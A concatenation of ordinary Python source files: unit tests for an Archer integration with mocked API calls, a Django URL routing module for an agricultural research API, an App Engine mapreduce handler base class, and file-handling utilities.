- Fields to search on records and id fields to search by ID.
When:
- Running search_records_soap_request to build the XML body.
Then:
- Ensure the correct condition is exist in the XML request body.
"""
xml_request = search_records_soap_request('token', 'app_id', 'display_fields', 'field_id',
field_name, '1234', field_to_search_by_id=field_to_search_by_id,
level_id='5678')
assert expected_condition in xml_request
def test_get_field_value_list(self, requests_mock):
cache = demisto.getIntegrationContext()
cache['fieldValueList'] = {}
demisto.setIntegrationContext(cache)
requests_mock.post(BASE_URL + 'api/core/security/login',
json={'RequestedObject': {'SessionToken': 'session-id'}, 'IsSuccessful': True})
requests_mock.get(BASE_URL + 'api/core/system/fielddefinition/304', json=GET_FIElD_DEFINITION_RES)
requests_mock.get(BASE_URL + 'api/core/system/valueslistvalue/valueslist/62', json=VALUE_LIST_RES)
client = Client(BASE_URL, '', '', '', '', 400)
field_data = client.get_field_value_list(304)
assert VALUE_LIST_FIELD_DATA == field_data
def test_generate_field_value_text_input(self):
client = Client(BASE_URL, '', '', '', '', 400)
field_key, field_value = generate_field_value(client, "", {'Type': 1}, "Demisto")
assert field_key == 'Value'
assert field_value == 'Demisto'
def test_generate_field_value_values_list_input(self, requests_mock):
cache = demisto.getIntegrationContext()
cache['fieldValueList'] = {}
demisto.setIntegrationContext(cache)
requests_mock.post(BASE_URL + 'api/core/security/login',
json={'RequestedObject': {'SessionToken': 'session-id'}, 'IsSuccessful': True})
requests_mock.get(BASE_URL + 'api/core/system/fielddefinition/304', json=GET_FIElD_DEFINITION_RES)
requests_mock.get(BASE_URL + 'api/core/system/valueslistvalue/valueslist/62', json=VALUE_LIST_RES)
client = Client(BASE_URL, '', '', '', '', 400)
field_key, field_value = generate_field_value(client, "", {'Type': 4, 'FieldId': 304}, ["High"])
assert field_key == 'Value'
assert field_value == {'ValuesListIds': [473]}
def test_generate_field_external_link_input(self):
client = Client(BASE_URL, '', '', '', '', 400)
field_key, field_value = generate_field_value(client, "", {'Type': 7},
[{"value": "github", "link": "https://github.com"},
{"value": "google", "link": "https://google.com"}])
assert field_key == 'Value'
assert field_value == [{"Name": "github", "URL": "https://github.com"},
{"Name": "google", "URL": "https://google.com"}]
def test_generate_field_users_groups_input(self):
"""
Given:
Valid value from dictionary type under "fieldsToValues" argument
When:
- running archer-update-record
Then:
- assert fields are generated correctly
"""
client = Client(BASE_URL, '', '', '', '', 400)
field_key, field_value = generate_field_value(client, "", {'Type': 8}, {"users": [20], "groups": [30]})
assert field_key == 'Value'
assert field_value == {"UserList": [{"ID": 20}], "GroupList": [{"ID": 30}]}
def test_generate_invalid_field_users_groups_input(self):
"""
Given:
Invalid value under "fieldsToValues" argument with type 8 (lists)
When:
- running archer-update-record
Then:
- Raise exception indicates that the value is not with the right format
"""
client = Client(BASE_URL, '', '', '', '', 400)
with pytest.raises(DemistoException) as e:
generate_field_value(client, "test", {'Type': 8}, 'user1, user2')
assert "The value of the field: test must be a dictionary type and include a list under \"users\" key or " \
"\"groups\" key e.g: {\"Policy Owner\":{\"users\":[20],\"groups\":[30]}}" in str(e.value)
@pytest.mark.parametrize('field_value, result', [
([1, 2], [{"ContentID": 1}, {"ContentID": 2}]),
(1234, [{"ContentID": 1234}])
])
def test_generate_field_cross_reference_input(self, field_value, result):
client = Client(BASE_URL, '', '', '', '', 400)
field_key, field_value = generate_field_value(client, "", {'Type': 9}, field_value)
assert field_key == 'Value'
assert field_value == result
def test_generate_field_ip_address_input(self):
client = Client(BASE_URL, '', '', '', '', 400)
field_key, field_value = generate_field_value(client, "", {'Type': 19}, '127.0.0.1')
assert field_key == 'IpAddressBytes'
assert field_value == '127.0.0.1'
def test_generate_field_value(self, requests_mock):
"""
Given
- generate_field_value on Values List type
When
- the source is not a list
Then
- ensure generate_field_value will handle it
"""
cache = demisto.getIntegrationContext()
cache['fieldValueList'] = {}
demisto.setIntegrationContext(cache)
requests_mock.get(BASE_URL + 'api/core/system/fielddefinition/16172', json=GET_FIElD_DEFINITION_RES)
requests_mock.post(BASE_URL + 'api/core/security/login',
json={'RequestedObject': {'SessionToken': 'session-id'}, 'IsSuccessful': 'yes'})
requests_mock.get(BASE_URL + 'api/core/system/valueslistvalue/valueslist/62', json=VALUE_LIST_RES_FOR_SOURCE)
client = Client(BASE_URL, '', '', '', '', 400)
field_key, field_value = generate_field_value(client, "Source",
{'FieldId': '16172', 'IsRequired': False, 'Name':
'Source', 'RelatedValuesListId': 2092, 'Type': 4}, 'ArcSight')
assert field_key == 'Value'
assert field_value == {'ValuesListIds': [471]}
def test_record_to_incident_europe_time(self):
"""
Given:
record with european time (day first)
When:
fetching incidents
Then:
assert return dates are right
"""
client = Client(BASE_URL, '', '', '', '', 400)
incident = INCIDENT_RECORD.copy()
incident['raw']['Field'][1]['@xmlConvertedValue'] = '2018-03-26T10:03:00Z'
incident['record']['Date/Time Reported'] = "26/03/2018 10:03 AM"
incident, incident_created_time = client.record_to_incident(INCIDENT_RECORD, 75, '305')
assert incident_created_time == datetime(2018, 3, 26, 10, 3, tzinfo=timezone.utc)
assert incident['occurred'] == '2018-03-26T10:03:00Z'
def test_record_to_incident_american_time(self):
"""
Given:
record with american time (month first)
When:
fetching incidents
Then:
assert return dates are right
"""
client = Client(BASE_URL, '', '', '', '', 400)
incident = INCIDENT_RECORD.copy()
incident['record']['Date/Time Reported'] = '03/26/2018 10:03 AM'
incident['raw']['Field'][1]['@xmlConvertedValue'] = '2018-03-26T10:03:00Z'
incident, incident_created_time = client.record_to_incident(
INCIDENT_RECORD, 75, '305'
)
assert incident_created_time == datetime(2018, 3, 26, 10, 3, tzinfo=timezone.utc)
assert incident['occurred'] == '2018-03-26T10:03:00Z'
def test_fetch_time_change(self, mocker):
"""
Given:
incident with date/time reported
european time (day first) - True or false
When:
Fetching incidents
Then:
Check that the new next fetch is greater than last_fetch
Check the wanted next_fetch is true
Assert occurred time
"""
client = Client(BASE_URL, '', '', '', '', 400)
date_time_reported = '2018-04-03T10:03:00.000Z'
params = {
'applicationId': '75',
'applicationDateField': 'Date/Time Reported'
}
record = copy.deepcopy(INCIDENT_RECORD)
record['record']['Date/Time Reported'] = date_time_reported
record['raw']['Field'][1]['@xmlConvertedValue'] = date_time_reported
last_fetch = get_fetch_time(
{'last_fetch': '2018-03-01T10:03:00Z'}, params.get('fetch_time', '3 days')
)
mocker.patch.object(client, 'search_records', return_value=([record], {}))
incidents, next_fetch = fetch_incidents(client, params, last_fetch, '305')
assert last_fetch < next_fetch
assert next_fetch == datetime(2018, 4, 3, 10, 3, tzinfo=timezone.utc)
assert incidents[0]['occurred'] == date_time_reported
def test_two_fetches(self, mocker):
"""
Given:
2 incident with date/time reported
running two fetches.
When:
Fetching incidents
Then:
Check that the new next fetch is greater than last_fetch on both calls.
Check the wanted next_fetch is equals to the date in the incident in both calls.
Assert occurred time
"""
client = Client(BASE_URL, '', '', '', '', 400)
params = {
'applicationId': '75',
'applicationDateField': 'Date/Time Reported'
}
record1, record2 = copy.deepcopy(INCIDENT_RECORD), copy.deepcopy(INCIDENT_RECORD)
record1['record']['Date/Time Reported'] = '18/03/2020 10:30 AM'
record2['record']['Date/Time Reported'] = '18/03/2020 03:30 PM'
record1['raw']['Field'][1]['@xmlConvertedValue'] = '2020-03-18T10:30:00.000Z'
record2['raw']['Field'][1]['@xmlConvertedValue'] = '2020-03-18T15:30:00.000Z'
last_fetch = parser('2020-18-03T09:00:00Z')
mocker.patch.object(
client, 'search_records', side_effect=[
([record1], {}),
([record2], {})
]
)
incidents, next_fetch = fetch_incidents(client, params, last_fetch, '305')
assert last_fetch < next_fetch
assert next_fetch == datetime(2020, 3, 18, 10, 30, tzinfo=timezone.utc)
assert incidents[0]['occurred'] == '2020-03-18T10:30:00.000Z'
incidents, next_fetch = fetch_incidents(client, params, next_fetch, '305')
assert last_fetch < next_fetch
assert next_fetch == datetime(2020, 3, 18, 15, 30, tzinfo=timezone.utc)
assert incidents[0]['occurred'] == '2020-03-18T15:30:00.000Z'
def test_fetch_got_old_incident(self, mocker):
"""
Given:
last_fetch is newer than new incident
When:
Fetching incidents
Then:
Check that the next fetch is equals last fetch (no new incident)
Check that no incidents brought back
"""
client = Client(BASE_URL, '', '', '', '', 400)
date_time_reported = '2018-03-01T10:02:00.000Z'
params = {
'applicationId': '75',
'applicationDateField': 'Date/Time Reported'
}
record = copy.deepcopy(INCIDENT_RECORD)
record['record']['Date/Time Reported'] = date_time_reported
record['raw']['Field'][1]['@xmlConvertedValue'] = date_time_reported
last_fetch = get_fetch_time(
{'last_fetch': '2018-03-01T10:03:00Z'}, params.get('fetch_time', '3 days')
)
mocker.patch.object(client, 'search_records', return_value=([record], {}))
incidents, next_fetch = fetch_incidents(client, params, last_fetch, '305')
assert last_fetch == next_fetch
assert not incidents, 'Should not get new incidents.'
def test_fetch_got_exact_same_time(self, mocker):
"""
Given:
last_fetch is in the exact same time as the incident
When:
Fetching incidents
Then:
Check that the next fetch is equals last fetch (no new incident)
Check that no incidents brought back
"""
client = Client(BASE_URL, '', '', '', '', 400)
date_time_reported = '2018-03-01T10:02:00.000Z'
params = {
'applicationId': '75',
'applicationDateField': 'Date/Time Reported'
}
record = copy.deepcopy(INCIDENT_RECORD)
record['record']['Date/Time Reported'] = date_time_reported
record['raw']['Field'][1]['@xmlConvertedValue'] = date_time_reported
last_fetch = get_fetch_time(
{'last_fetch': date_time_reported}, params.get('fetch_time', '3 days')
)
mocker.patch.object(client, 'search_records', return_value=([record], {}))
incidents, next_fetch = fetch_incidents(client, params, last_fetch, '305')
assert last_fetch == next_fetch
assert not incidents, 'Should not get new incidents.'
def test_same_record_returned_in_two_fetches(self, mocker):
"""
Given:
- Same record returned in 2 fetch queries
When:
- Fetching incidents (2 iterations)
Then:
Check that the new next fetch is greater than last_fetch on both calls.
Check the wanted next_fetch is equals to the date in the incident in both calls.
Assert occurred time
"""
client = Client(BASE_URL, '', '', '', '', 400)
mocker.patch.object(
client, 'search_records', side_effect=[
([INCIDENT_RECORD_US_TZ], {}),
([INCIDENT_RECORD_US_TZ], {})
]
)
params = {
'applicationId': '75',
'applicationDateField': 'created date'
}
field_time_id = '53075'
first_fetch = parser('2021-02-24T08:45:55Z')
incidents, first_next_fetch = fetch_incidents(client, params, first_fetch, field_time_id)
assert first_fetch < first_next_fetch
assert first_next_fetch == datetime(2021, 2, 25, 8, 45, 55, 977000, tzinfo=timezone.utc)
assert incidents[0]['occurred'] == '2021-02-25T08:45:55.977Z'
# first_next_fetch_dt simulates the set to last_run done in fetch-incidents
first_next_fetch_dt = parser(first_next_fetch.strftime(OCCURRED_FORMAT))
incidents, second_next_fetch = fetch_incidents(client, params, first_next_fetch_dt, field_time_id)
assert first_next_fetch == datetime(2021, 2, 25, 8, 45, 55, 977000, tzinfo=timezone.utc)
assert not incidents
def test_search_records_by_report_command(self, mocker):
"""
Given:
- search_records_by_report_command command args
When:
- run search_records_by_report_command
Then:
- Verify response outputs
- verify response readable output
"""
mock_args = {'reportGuid': 'id'}
client = Client(BASE_URL, '', '', '', '', 400)
mocker.patch.object(client, 'do_soap_request',
return_value=[SEARCH_RECORDS_BY_REPORT_RES, SEARCH_RECORDS_BY_REPORT_RES])
mocker.patch.object(client, 'do_request', return_value=GET_LEVEL_RES_2)
mocker.patch.object(demisto, 'results')
search_records_by_report_command(client, mock_args)
assert demisto.results.call_args_list[0][0][0]['HumanReadable'] == MOCK_READABLE_SEARCH_RECORDS_BY_REPORT
assert demisto.results.call_args_list[0][0][0]['Contents'] == MOCK_RESULTS_SEARCH_RECORDS_BY_REPORT
|
|
from django.conf.urls import url
from .views import (
research_nitrogen_applied_views,
nitrogen_applied_views,
research_measurement_year_views,
measurement_duration_views,
measurement_season_views,
measurement_year_views,
research_diversity_views,
diversity_views,
research_experiment_description_views,
experiment_description_views,
research_experiment_replicate_views,
experiment_replicate_views,
research_author_views,
journal_views,
author_views,
experiment_unit_views,
research_experiment_unit_views,
breed_views,
experiment_unit_category_views,
research_views,
)
# Research nitrogen applied URLs
urlpatterns = [
url(
r'^researchnitrogenapplied/$',
research_nitrogen_applied_views['ResearchNitrogenAppliedListAPIView'].as_view(),
name='research_nitrogen_applied_list'
),
url(
r'^researchnitrogenapplied/create/$',
research_nitrogen_applied_views['ResearchNitrogenAppliedCreateAPIView'].as_view(),
name='research_nitrogen_applied_create'
),
url(
r'^researchnitrogenapplied/(?P<pk>[\w-]+)/$',
research_nitrogen_applied_views['ResearchNitrogenAppliedDetailAPIView'].as_view(),
name='research_nitrogen_applied_detail'
),
]
# Nitrogen applied URLs
urlpatterns += [
url(
r'^nitrogenapplied/$',
nitrogen_applied_views['NitrogenAppliedListAPIView'].as_view(),
name='nitrogen_applied_list'
),
url(
r'^nitrogenapplied/create/$',
nitrogen_applied_views['NitrogenAppliedCreateAPIView'].as_view(),
name='nitrogen_applied_create'
),
url(
r'^nitrogenapplied/(?P<pk>[\w-]+)/$',
nitrogen_applied_views['NitrogenAppliedDetailAPIView'].as_view(),
name='nitrogen_applied_detail'
),
]
# Research measurement year URLs
urlpatterns += [
url(
r'^researchmeasurementyear/$',
research_measurement_year_views['ResearchMeasurementYearListAPIView'].as_view(),
name='research_measurement_year_list'
),
url(
r'^researchmeasurementyear/create/$',
research_measurement_year_views['ResearchMeasurementYearCreateAPIView'].as_view(),
name='research_measurement_year_create'
),
url(
r'^researchmeasurementyear/(?P<pk>[\w-]+)/$',
research_measurement_year_views['ResearchMeasurementYearDetailAPIView'].as_view(),
name='research_measurement_year_detail'
),
]
# Measurement duration URLs
urlpatterns += [
url(
r'^measurementduration/$',
measurement_duration_views['MeasurementDurationListAPIView'].as_view(),
name='measurement_duration_list'
),
url(
r'^measurementduration/create/$',
measurement_duration_views['MeasurementDurationCreateAPIView'].as_view(),
name='measurement_duration_create'
),
url(
r'^measurementduration/(?P<pk>[\w-]+)/$',
measurement_duration_views['MeasurementDurationDetailAPIView'].as_view(),
name='measurement_duration_detail'
),
]
# Measurement season URLs
urlpatterns += [
url(
r'^measurementseason/$',
measurement_season_views['MeasurementSeasonListAPIView'].as_view(),
name='measurement_season_list'
),
url(
r'^measurementseason/create/$',
measurement_season_views['MeasurementSeasonCreateAPIView'].as_view(),
name='measurement_season_create'
),
url(
r'^measurementseason/(?P<slug>[\w-]+)/$',
measurement_season_views['MeasurementSeasonDetailAPIView'].as_view(),
name='measurement_season_detail'
),
]
# Measurement year URLs
urlpatterns += [
url(
r'^measurementyear/$',
measurement_year_views['MeasurementYearListAPIView'].as_view(),
name='measurement_year_list'
),
url(
r'^measurementyear/create/$',
measurement_year_views['MeasurementYearCreateAPIView'].as_view(),
name='measurement_year_create'
),
url(
r'^measurementyear/(?P<slug>[\w-]+)/$',
measurement_year_views['MeasurementYearDetailAPIView'].as_view(),
name='measurement_year_detail'
),
]
# Research diversity URLs
urlpatterns += [
url(
r'^researchdiversity/$',
research_diversity_views['ResearchDiversityListAPIView'].as_view(),
name='research_diversity_list'
),
url(
r'^researchdiversity/create/$',
research_diversity_views['ResearchDiversityCreateAPIView'].as_view(),
name='research_diversity_create'
),
url(
r'^researchdiversity/(?P<pk>[\w-]+)/$',
research_diversity_views['ResearchDiversityDetailAPIView'].as_view(),
name='research_diversity_detail'
),
]
# Diversity URLs
urlpatterns += [
url(
r'^diversity/$',
diversity_views['DiversityListAPIView'].as_view(),
name='diversity_list'
),
url(
r'^diversity/create/$',
diversity_views['DiversityCreateAPIView'].as_view(),
name='diversity_create'
),
url(
r'^diversity/(?P<slug>[\w-]+)/$',
diversity_views['DiversityDetailAPIView'].as_view(),
name='diversity_detail'
),
]
# Research experiment description URLs
urlpatterns += [
url(
r'^researchexperimentdescription/$',
research_experiment_description_views['ResearchExperimentDescriptionListAPIView'].as_view(),
name='research_experiment_description_list'
),
url(
r'^researchexperimentdescription/create/$',
research_experiment_description_views['ResearchExperimentDescriptionCreateAPIView'].as_view(),
name='research_experiment_description_create'
),
url(
r'^researchexperimentdescription/(?P<pk>[\w-]+)/$',
research_experiment_description_views['ResearchExperimentDescriptionDetailAPIView'].as_view(),
name='research_experiment_description_detail'
),
]
# Experiment description URLs
urlpatterns += [
url(
r'^experimentdescription/$',
experiment_description_views['ExperimentDescriptionListAPIView'].as_view(),
name='experiment_description_list'
),
url(
r'^experimentdescription/create/$',
experiment_description_views['ExperimentDescriptionCreateAPIView'].as_view(),
name='experiment_description_create'
),
url(
r'^experimentdescription/(?P<slug>[\w-]+)/$',
experiment_description_views['ExperimentDescriptionDetailAPIView'].as_view(),
name='experiment_description_detail'
),
]
# Research experiment replicate URLs
urlpatterns += [
url(
r'^researchexperimentreplicate/$',
research_experiment_replicate_views['ResearchExperimentReplicateListAPIView'].as_view(),
name='research_experiment_replicate_list'
),
url(
r'^researchexperimentreplicate/create/$',
research_experiment_replicate_views['ResearchExperimentReplicateCreateAPIView'].as_view(),
name='research_experiment_replicate_create'
),
url(
r'^researchexperimentreplicate/(?P<pk>[\w-]+)/$',
research_experiment_replicate_views['ResearchExperimentReplicateDetailAPIView'].as_view(),
name='research_experiment_replicate_detail'
),
]
# Experiment replicate URLs
urlpatterns += [
url(
r'^experimentreplicate/$',
experiment_replicate_views['ExperimentReplicateListAPIView'].as_view(),
name='experiment_replicate_list'
),
url(
r'^experimentreplicate/create/$',
experiment_replicate_views['ExperimentReplicateCreateAPIView'].as_view(),
name='experiment_replicate_create'
),
url(
r'^experimentreplicate/(?P<pk>[\w-]+)/$',
experiment_replicate_views['ExperimentReplicateDetailAPIView'].as_view(),
name='experiment_replicate_detail'
),
]
# Research author URLs
urlpatterns += [
url(
r'^researchauthor/$',
research_author_views['ResearchAuthorListAPIView'].as_view(),
name='research_author_list'
),
url(
r'^researchauthor/create/$',
research_author_views['ResearchAuthorCreateAPIView'].as_view(),
name='research_author_create'
),
url(
r'^researchauthor/(?P<pk>[\w-]+)/$',
research_author_views['ResearchAuthorDetailAPIView'].as_view(),
name='research_author_detail'
),
]
# Journal URLs
urlpatterns += [
url(
r'^journal/$',
journal_views['JournalListAPIView'].as_view(),
name='journal_list'
),
url(
r'^journal/create/$',
journal_views['JournalCreateAPIView'].as_view(),
name='journal_create'
),
url(
r'^journal/(?P<slug>[\w-]+)/$',
journal_views['JournalDetailAPIView'].as_view(),
name='journal_detail'
),
]
# Author URLs
urlpatterns += [
url(
r'^author/$',
author_views['AuthorListAPIView'].as_view(),
name='author_list'
),
url(
r'^author/create/$',
author_views['AuthorCreateAPIView'].as_view(),
name='author_create'
),
url(
r'^author/(?P<slug>[\w-]+)/$',
author_views['AuthorDetailAPIView'].as_view(),
name='author_detail'
),
]
# Experiment unit category URLs
urlpatterns += [
url(
r'^experimentunitcategory/$',
experiment_unit_category_views['ExperimentUnitCategoryListAPIView'].as_view(),
name='experiment_unit_category_list'
),
url(
r'^experimentunitcategory/create/$',
experiment_unit_category_views['ExperimentUnitCategoryCreateAPIView'].as_view(),
name='experiment_unit_category_create'
),
url(
r'^experimentunitcategory/(?P<slug>[\w-]+)/$',
experiment_unit_category_views['ExperimentUnitCategoryDetailAPIView'].as_view(),
name='experiment_unit_category_detail'
),
]
# Research experiment unit URLs
urlpatterns += [
url(
r'^researchexperimentunit/$',
research_experiment_unit_views['ResearchExperimentUnitListAPIView'].as_view(),
name='research_experiment_unit_list'
),
url(
r'^researchexperimentunit/create/$',
research_experiment_unit_views['ResearchExperimentUnitCreateAPIView'].as_view(),
name='research_experiment_unit_create'
),
url(
r'^researchexperimentunit/(?P<pk>[\w-]+)/$',
research_experiment_unit_views['ResearchExperimentUnitDetailAPIView'].as_view(),
name='research_experiment_unit_detail'
),
]
#Breed URLs
urlpatterns += [
url(
r'^breed/$',
breed_views['BreedListAPIView'].as_view(),
name='breed_list'
),
url(
r'^breed/create/$',
breed_views['BreedCreateAPIView'].as_view(),
name='breed_create'
),
url(
r'^breed/(?P<slug>[\w-]+)/$',
breed_views['BreedDetailAPIView'].as_view(),
name='breed_detail'
),
]
# Experiment unit URLs
urlpatterns += [
url(
r'^experimentunit/$',
experiment_unit_views['ExperimentUnitListAPIView'].as_view(),
name='experiment_unit_list'
),
url(
r'^experimentunit/create/$',
experiment_unit_views['ExperimentUnitCreateAPIView'].as_view(),
name='experiment_unit_create'
),
url(
r'^experimentunit/(?P<slug>[\w-]+)/$',
experiment_unit_views['ExperimentUnitDetailAPIView'].as_view(),
name='experiment_unit_detail'
),
]
# Research URLs
urlpatterns += [
url(r'^$', research_views['ResearchListAPIView'].as_view(), name='research_list'),
url(r'^create/$', research_views['ResearchCreateAPIView'].as_view(), name='research_create'),
url(r'^(?P<pk>[\w-]+)/$', research_views['ResearchDetailAPIView'].as_view(), name='research_detail'),
]
|
|
#!/usr/bin/env python
#
# Copyright 2010 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Base handler class for all mapreduce handlers."""
# pylint: disable=protected-access
# pylint: disable=g-bad-name
# pylint: disable=g-import-not-at-top
import httplib
import logging
from mapreduce.lib import simplejson
try:
from mapreduce import pipeline_base
except ImportError:
pipeline_base = None
try:
import cloudstorage
except ImportError:
cloudstorage = None
from google.appengine.ext import webapp
from mapreduce import errors
from mapreduce import model
from mapreduce import parameters
class Error(Exception):
"""Base-class for exceptions in this module."""
class BadRequestPathError(Error):
"""The request path for the handler is invalid."""
class BaseHandler(webapp.RequestHandler):
"""Base class for all mapreduce handlers.
In Python27 runtime, webapp2 will automatically replace webapp.
"""
def base_path(self):
"""Base path for all mapreduce-related urls."""
path = self.request.path
return path[:path.rfind("/")]
class TaskQueueHandler(BaseHandler):
"""Base class for handlers intended to be run only from the task queue.
Sub-classes should implement
1. the 'handle' method for all POST request.
2. '_preprocess' method for decoding or validations before handle.
3. '_drop_gracefully' method if _preprocess fails and the task has to
be dropped.
"""
def __init__(self, *args, **kwargs):
# webapp framework invokes initialize after __init__.
# webapp2 framework invokes initialize within __init__.
# Python27 runtime swap webapp with webapp2 underneath us.
# Since initialize will conditionally change this field,
# it needs to be set before calling super's __init__.
self._preprocess_success = False
super(TaskQueueHandler, self).__init__(*args, **kwargs)
if cloudstorage:
cloudstorage.set_default_retry_params(
cloudstorage.RetryParams(save_access_token=True))
def initialize(self, request, response):
"""Initialize.
1. call webapp init.
2. check request is indeed from taskqueue.
3. check the task has not been retried too many times.
4. run handler specific processing logic.
5. run error handling logic if precessing failed.
Args:
request: a webapp.Request instance.
response: a webapp.Response instance.
"""
super(TaskQueueHandler, self).initialize(request, response)
# Check request is from taskqueue.
if "X-AppEngine-QueueName" not in self.request.headers:
logging.error(self.request.headers)
logging.error("Task queue handler received non-task queue request")
self.response.set_status(
403, message="Task queue handler received non-task queue request")
return
# Check task has not been retried too many times.
if self.task_retry_count() > parameters._MAX_TASK_RETRIES:
logging.error(
"Task %s has been retried %s times. Dropping it permanently.",
self.request.headers["X-AppEngine-TaskName"], self.task_retry_count())
self._drop_gracefully()
return
try:
self._preprocess()
self._preprocess_success = True
# pylint: disable=bare-except
except:
self._preprocess_success = False
logging.error(
"Preprocess task %s failed. Dropping it permanently.",
self.request.headers["X-AppEngine-TaskName"])
self._drop_gracefully()
def post(self):
if self._preprocess_success:
self.handle()
def handle(self):
"""To be implemented by subclasses."""
raise NotImplementedError()
def _preprocess(self):
"""Preprocess.
This method is called after webapp initialization code has been run
successfully. It can thus access self.request, self.response and so on.
"""
pass
def _drop_gracefully(self):
"""Drop task gracefully.
When preprocess failed, this method is called before the task is dropped.
"""
pass
def task_retry_count(self):
"""Number of times this task has been retried."""
return int(self.request.headers.get("X-AppEngine-TaskExecutionCount", 0))
def retry_task(self):
"""Ask taskqueue to retry this task.
Even though raising an exception can cause a task retry, it
will flood logs with highly visible ERROR logs. Handlers should uses
this method to perform controlled task retries. Only raise exceptions
for those deserve ERROR log entries.
"""
self.response.set_status(httplib.SERVICE_UNAVAILABLE, "Retry task")
self.response.clear()
class JsonHandler(BaseHandler):
"""Base class for JSON handlers for user interface.
Sub-classes should implement the 'handle' method. They should put their
response data in the 'self.json_response' dictionary. Any exceptions raised
by the sub-class implementation will be sent in a JSON response with the
name of the error_class and the error_message.
"""
def __init__(self, *args):
"""Initializer."""
super(BaseHandler, self).__init__(*args)
self.json_response = {}
def base_path(self):
"""Base path for all mapreduce-related urls.
JSON handlers are mapped to /base_path/command/command_name thus they
require special treatment.
"""
path = self.request.path
base_path = path[:path.rfind("/")]
if not base_path.endswith("/command"):
raise BadRequestPathError(
"Json handlers should have /command path prefix")
return base_path[:base_path.rfind("/")]
def _handle_wrapper(self):
if self.request.headers.get("X-Requested-With") != "XMLHttpRequest":
logging.error("Got JSON request with no X-Requested-With header")
self.response.set_status(
403, message="Got JSON request with no X-Requested-With header")
return
self.json_response.clear()
try:
self.handle()
except errors.MissingYamlError:
logging.debug("Could not find 'mapreduce.yaml' file.")
self.json_response.clear()
self.json_response["error_class"] = "Notice"
self.json_response["error_message"] = "Could not find 'mapreduce.yaml'"
except Exception, e:
logging.exception("Error in JsonHandler, returning exception.")
# TODO(user): Include full traceback here for the end-user.
self.json_response.clear()
self.json_response["error_class"] = e.__class__.__name__
self.json_response["error_message"] = str(e)
self.response.headers["Content-Type"] = "text/javascript"
try:
output = simplejson.dumps(self.json_response, cls=model.JsonEncoder)
except:
logging.exception("Could not serialize to JSON")
self.response.set_status(500, message="Could not serialize to JSON")
return
else:
self.response.out.write(output)
def handle(self):
"""To be implemented by sub-classes."""
raise NotImplementedError()
class PostJsonHandler(JsonHandler):
"""JSON handler that accepts POST requests."""
def post(self):
self._handle_wrapper()
class GetJsonHandler(JsonHandler):
"""JSON handler that accepts GET posts."""
def get(self):
self._handle_wrapper()
class HugeTaskHandler(TaskQueueHandler):
"""Base handler for processing HugeTasks."""
class _RequestWrapper(object):
def __init__(self, request):
self._request = request
self._params = model.HugeTask.decode_payload(request)
def get(self, name, default=""):
return self._params.get(name, default)
def set(self, name, value):
self._params[name] = value
def __getattr__(self, name):
return getattr(self._request, name)
def __init__(self, *args, **kwargs):
super(HugeTaskHandler, self).__init__(*args, **kwargs)
def _preprocess(self):
self.request = self._RequestWrapper(self.request)
if pipeline_base:
# For backward compatiblity.
PipelineBase = pipeline_base.PipelineBase
else:
PipelineBase = None
|
|
# Copyright 2012 majgis Contributors
#
# Individuals comprising majgis Contributors are identified in
# the NOTICE file found in the root directory of this project.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
# or
# in the file named LICENSE in the root directory of this project.
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
''' File related utilities.
'''
import os
def getLastLine(f, blockSize=3072):
"""Return the last line of a file
If the last line is an empty string, the second to last line is returned.
"""
f.seek(0,os.SEEK_END)
totalBytes = f.tell()
if totalBytes > blockSize:
f.seek(-blockSize,os.SEEK_END)
else:
f.seek(0)
lastLines = f.readlines()
lastLine = lastLines[-1]
if lastLine =='':
lastLine = lastLines[-2]
return lastLine
def multipleFileReadLines(filePaths):
""" Generator for concurrent lines in files from a list of full file paths
A fileBuffer is loaded for each file, opening and then closing a single file at a time.
The position in the file is recorded with each fileBuffer extraction,
so the next opening of the file will extract lines from the proper position.
All files are assumed to have the same number of records, but line length need not be the same
"""
buffers = []
filePositions = []
for filePath in filePaths:
lines, filePosition= readMultipleFileLinesAndPositions(filePath)
buffers.append(lines)
filePositions.append(filePosition)
linesRemaining = True
while linesRemaining:
currentLines = []
for i,fileBuffer in enumerate(buffers):
currentLines.append(fileBuffer[0].strip())
del fileBuffer[0]
if ( not(fileBuffer) and linesRemaining):
lines, filePosition = readMultipleFileLinesAndPositions(filePaths[i],filePositions[i])
buffers[i] = lines
filePositions[i] = filePosition
linesRemaining = bool(lines)
yield currentLines
def readMultipleFileLinesAndPositions(filePath,startPosition=None, bytesToRead=1):
""" Extracts lines from file, starting at the specified startPosition.
The file-object's readlines() method is used to extract lines,
and the tell() method is used to return the position of the next line in the file.
The bytesToRead value is passed as an argument to readlines(). The default bytesToRead value is set to 1
so that readlines() uses its own default buffer size (somewhere near 8359 bytesToRead)
"""
f = open(filePath, 'rb')
if not startPosition is None:
f.seek(startPosition)
lines = f.readlines(bytesToRead)
position = f.tell()
f.close()
return lines, position
class multipleFileWriterWithBuffer():
""" Write lines to multiple files efficiently.
Maintains a buffer for each file.
Writes to disk when length of all strings in buffer exceeds strLen parameter.
Creating new strings is inefficient, so buffer is stored as list of strings.
"""
def __init__(self, filePaths=[], outDir=None, initialDelete=True, strLen=8092):
""" Initializer """
# Class level variables
self.strLen = strLen
self.filePathDict = {}
self.outDir = outDir
if filePaths:
self.addFiles(filePaths)
# Delete files by default, unless default overridden
if initialDelete:
self.deleteAllFiles(False)
def __del__(self):
""" Destructor
Buffer is flushed when object is destroyed
"""
self.flush()
def __writeToFile(self, filePath, lst):
""" Write lines to file
Write lines joined by the delimiter.
"""
if not self.outDir is None:
filePath = os.path.join(self.outDir, filePath)
open(filePath,'a').writelines(lst)
def writeMultipleFileLines(self, filePaths, liness):
""" Write lines to multiple files
liness: list of lists, one for each filePath
Buffer is written to file when buffer exceeds strLen
Line separators are not added.
"""
for i,filePath in enumerate(filePaths):
self.writeSingleFileLines(filePath,liness[i])
def writeSingleFileLines(self, filePath, lines):
""" Add lines in iterable to buffer
